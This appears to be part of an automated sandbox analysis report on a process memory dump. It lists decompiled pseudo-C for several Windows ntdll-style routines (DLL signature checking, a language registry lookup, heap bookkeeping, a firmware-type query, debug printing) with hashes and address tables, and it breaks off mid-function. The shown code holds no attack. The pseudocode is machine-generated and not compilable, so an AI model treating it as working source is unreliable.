0x053d7e77
0x053d7e79
0x053d7e79
0x053d7e7e
0x053d7f45
0x05429848
0x00000000
0x05429848
0x053d7f4e
0x053d7f53
0x053d7f5a
0x00000000
0x00000000
0x0542985a
0x05429862
0x05429866
0x00000000
0x0542986c
0x00000000
0x0542986c
0x053d7e84
0x053d7e84
0x053d7e8d
0x05429871
0x053d7eb8
0x053d7ec0
0x053d7ec0
0x053d7e9a
0x0542987e
0x00000000
0x00000000
0x05429884
0x0542988b
0x054298a7
0x054298ac
0x054298b1
0x054298b6
0x054298b8
0x054298b8
0x054298b9
0x00000000
0x054298b9
0x053d7ea0
0x053d7ea7
0x00000000
0x00000000
0x053d7eac
0x053d7eb1
0x053d7ec6
0x053d7ed0
0x054298cc
0x053d7ed6
0x053d7ed6
0x053d7ed6
0x053d7ede
0x053d7ee3
0x054298e3
0x054298f0
0x05429902
0x054298f2
0x054298fb
0x054298fb
0x05429907
0x0542991d
0x0542991d
0x05429907
0x054298e3
0x053d7ef0
0x053d7f14
0x053d7f14
0x053d7f1e
0x05429946
0x053d7f24
0x053d7f24
0x053d7f24
0x053d7f2c
0x0542996a
0x05429975
0x05429975
0x0542997e
0x05429993
0x05429993
0x0542997e
0x00000000
0x053d7ef2
0x053d7efc
0x053d7f0a
0x053d7f0e
0x05429933
0x00000000
0x05429933
0x00000000
0x053d7f0e
0x00000000
0x00000000
0x00000000
0x053d7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 05429891
LdrpCompleteMapModule, xrefs: 05429898
minkernel\ntdll\ldrmap.c, xrefs: 054298A2

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: a42f9ec8ab9c45988943d79b102b855eae86245ecf242b5b4ba35bc7561084e7
Instruction ID: 43662fbd3dbf6522c32c76625b56de179addde27fc4d78f840262d368ff3bcb5
Opcode Fuzzy Hash: a42f9ec8ab9c45988943d79b102b855eae86245ecf242b5b4ba35bc7561084e7
Instruction Fuzzy Hash: 4851F4326047549BDB2ACB58D948BAABBF9FF00314F44059AE8529B7D1D770ED41C760

Uniqueness

Uniqueness Score: -1.00%

Function 053CE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E053CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E053CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E054095D0();
						}
						if(_t78 != 0) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0540FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0540BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05409600();
					if(_t97 < 0) {
						goto L6;
					}
					E0540BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L053CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0540BB40(_t83, _t102 + 0x24, _t78);
								if(L053D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0540BB40(_t84, _t102 + 0x24, _t94);
									if(L053D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x053ce620
0x053ce628
0x053ce62f
0x053ce631
0x053ce635
0x053ce637
0x053ce63e
0x05425503
0x05425503
0x053ce64c
0x053ce64c
0x053ce651
0x00000000
0x00000000
0x053ce661
0x053ce665
0x0542542a
0x053ce715
0x053ce71a
0x053ce71c
0x053ce720
0x053ce720
0x053ce727
0x053ce736
0x053ce736
0x053ce743
0x053ce743
0x053ce673
0x053ce678
0x053ce67d
0x053ce682
0x053ce685
0x053ce692
0x053ce69b
0x053ce6a3
0x053ce6ad
0x053ce6b1
0x053ce6b2
0x053ce6bb
0x053ce6bf
0x053ce6c0
0x053ce6c8
0x053ce6cc
0x053ce6d5
0x053ce6d9
0x00000000
0x00000000
0x053ce6e5
0x053ce6ea
0x053ce6f9
0x053ce70b
0x053ce70f
0x05425439
0x0542545e
0x0542545e
0x00000000
0x0542545e
0x0542543b
0x0542543e
0x05425440
0x05425445
0x05425472
0x05425475
0x0542548d
0x05425493
0x054254a9
0x00000000
0x00000000
0x054254ab
0x054254b4
0x054254bc
0x054254c8
0x054254de
0x054254fb
0x054254e0
0x054254e6
0x054254eb
0x054254eb
0x054254de
0x00000000
0x054254bc
0x05425477
0x0542547a
0x05425480
0x05425483
0x05425486
0x0542548b
0x00000000
0x00000000
0x00000000
0x0542548b
0x00000000
0x00000000
0x00000000
0x00000000
0x05425447
0x05425447
0x05425447
0x05425447
0x0542544e
0x00000000
0x00000000
0x05425450
0x05425452
0x05425455
0x0542545a
0x00000000
0x00000000
0x00000000
0x0542545c
0x0542546a
0x0542546d
0x0542546f
0x00000000
0x0542546f
0x053ce70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 053CE68C
InstallLanguageFallback, xrefs: 053CE6DB
@, xrefs: 053CE6C0

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 428a9de6f4d933c421d13de0979c5a572cb69708a4d94aa9065a30e14d5b7374
Instruction ID: bc47d3e7dd651973447c2f3f00bc5f3d84992dd892ad3f1a34e8ab909013944e
Opcode Fuzzy Hash: 428a9de6f4d933c421d13de0979c5a572cb69708a4d94aa9065a30e14d5b7374
Instruction Fuzzy Hash: 8C51CF766083659BC711EF64C444BEBB3E9BF88614F4409AEF989DB240E734DD0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 0548E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0548E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0548BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0548BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0548AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E05409730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0548A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0548A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E05409730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0548A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0548A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E053E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E053DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E053DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E053E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0547FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0548e547
0x0548e549
0x0548e54f
0x0548e553
0x0548e557
0x0548e55a
0x0548e55c
0x0548e55f
0x0548e561
0x0548e567
0x0548e56b
0x0548e7e2
0x00000000
0x0548e571
0x0548e575
0x0548e577
0x0548e57b
0x0548e57c
0x0548e57d
0x0548e57e
0x0548e57f
0x0548e588
0x0548e58f
0x0548e591
0x0548e592
0x0548e592
0x0548e596
0x0548e59e
0x0548e5a0
0x0548e5a6
0x0548e61d
0x0548e61d
0x0548e621
0x0548e623
0x0548e630
0x0548e630
0x0548e7e6
0x0548e7eb
0x0548e7ed
0x0548e7f4
0x0548e7fa
0x0548e7ff
0x0548e7ff
0x0548e80a
0x0548e812
0x0548e812
0x0548e5ab
0x0548e5b4
0x0548e5b9
0x0548e5be
0x0548e5c0
0x0548e5c2
0x0548e5c8
0x0548e5c9
0x0548e5cb
0x0548e5cc
0x0548e5d5
0x0548e5e4
0x0548e5f1
0x0548e5f8
0x0548e5f8
0x0548e5d5
0x0548e602
0x0548e616
0x0548e63d
0x0548e644
0x0548e64d
0x0548e652
0x0548e657
0x0548e659
0x0548e65b
0x0548e661
0x0548e662
0x0548e664
0x0548e665
0x0548e66e
0x0548e67d
0x0548e68a
0x0548e691
0x0548e691
0x0548e66e
0x0548e6b0
0x00000000
0x0548e6b6
0x0548e6bd
0x0548e6c7
0x0548e6d7
0x0548e6d9
0x0548e6db
0x0548e6de
0x0548e6e3
0x0548e6f3
0x0548e6fc
0x0548e700
0x0548e700
0x0548e704
0x0548e70a
0x0548e70a
0x0548e713
0x0548e716
0x0548e719
0x0548e720
0x0548e761
0x0548e76b
0x0548e774
0x0548e77a
0x0548e77a
0x0548e78a
0x0548e791
0x0548e799
0x0548e79b
0x0548e79f
0x0548e7aa
0x0548e7c0
0x0548e7ac
0x0548e7b2
0x0548e7b9
0x0548e7b9
0x0548e7c7
0x0548e806
0x00000000
0x0548e7c9
0x0548e7d1
0x0548e7d8
0x00000000
0x0548e7d8
0x00000000
0x00000000
0x0548e722
0x0548e72e
0x0548e748
0x0548e74c
0x0548e754
0x0548e756
0x0548e75c
0x0548e75c
0x00000000
0x0548e75c
0x0548e758
0x0548e758
0x00000000
0x0548e758
0x0548e750
0x00000000
0x00000000
0x0548e752
0x00000000
0x0548e752
0x0548e730
0x0548e735
0x0548e73d
0x0548e73f
0x00000000
0x00000000
0x0548e741
0x0548e741
0x00000000
0x0548e741
0x0548e739
0x00000000
0x00000000
0x0548e73b
0x00000000
0x0548e73b
0x0548e722
0x0548e720
0x0548e6b0
0x0548e618
0x00000000
0x0548e618

Strings

`, xrefs: 0548E670
`, xrefs: 0548E5D7

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: ab24f1258bc657afa4a030f1848802cbafa96815d7a993ee43ac90dcb11e8051
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 2A91A0313087419FE724EE65C844BABB7EABF84714F14896EF596CB280E774E814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054451BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E054451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x54a05f0);
				E0541D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E053DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E054453CA(0);
						return E0541D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0540F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E053E3690(1, _t117, 0x53a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0540AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L053E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0540AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0544500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05409860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x054451be
0x054451c3
0x054451c8
0x054451cd
0x054451d0
0x054451d3
0x054451d8
0x054451db
0x054451de
0x054451e0
0x054451e3
0x054451e6
0x054451e8
0x05445342
0x05445351
0x05445356
0x0544535a
0x05445360
0x05445363
0x05445366
0x05445369
0x05445369
0x0544536b
0x0544536b
0x05445370
0x054453a3
0x054453a4
0x054453a6
0x054453ab
0x054453ab
0x054453ae
0x054453ae
0x054453b5
0x054453bf
0x054453bf
0x05445375
0x05445396
0x054453a0
0x054453a0
0x00000000
0x05445396
0x05445377
0x05445379
0x0544537f
0x0544538c
0x05445390
0x00000000
0x05445390
0x054451ee
0x054451f1
0x05445301
0x05445310
0x05445315
0x05445318
0x0544531b
0x05445320
0x0544532e
0x05445331
0x00000000
0x05445331
0x05445328
0x05445329
0x00000000
0x05445329
0x054451fa
0x05445235
0x05445236
0x05445239
0x0544523f
0x05445240
0x05445241
0x05445242
0x05445246
0x05445247
0x0544524e
0x05445251
0x05445267
0x05445269
0x0544526e
0x0544527d
0x0544527e
0x05445281
0x05445282
0x05445287
0x05445288
0x0544528a
0x0544528f
0x05445294
0x00000000
0x00000000
0x0544529a
0x0544529c
0x0544529e
0x0544529e
0x054452a4
0x054452b0
0x00000000
0x00000000
0x054452ba
0x054452bc
0x054452bc
0x054452d4
0x054452d9
0x054452dc
0x054452e1
0x00000000
0x00000000
0x054452e7
0x054452f4
0x00000000
0x054452f4
0x05445270
0x00000000
0x05445270
0x054451fc
0x054451fd
0x05445202
0x05445203
0x05445205
0x0544520a
0x0544520f
0x00000000
0x00000000
0x0544521b
0x05445226
0x0544522b
0x0544521d
0x0544521d
0x05445222
0x05445222
0x0544522d
0x00000000

Strings

Legacy, xrefs: 05445226
UEFI, xrefs: 0544521D

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 4eb0463d887740ef3d2f362bc4a63226a1b407ab35d3453d4cb844d3e89d7d18
Instruction ID: 92cc1f8d671e3f829731a38fb6fa35bfc4270734cbbfbce87155c9bc47ef600b
Opcode Fuzzy Hash: 4eb0463d887740ef3d2f362bc4a63226a1b407ab35d3453d4cb844d3e89d7d18
Instruction Fuzzy Hash: C4517D72A446189FEF25DFA99980AEEBBF9FB48700F14406EE509EB281D7719D01CF10

Uniqueness

Uniqueness Score: -1.00%

Function 053CB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x549f7a8);
				E0541D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0541D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0540D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0540F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0541DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0540B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0540B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
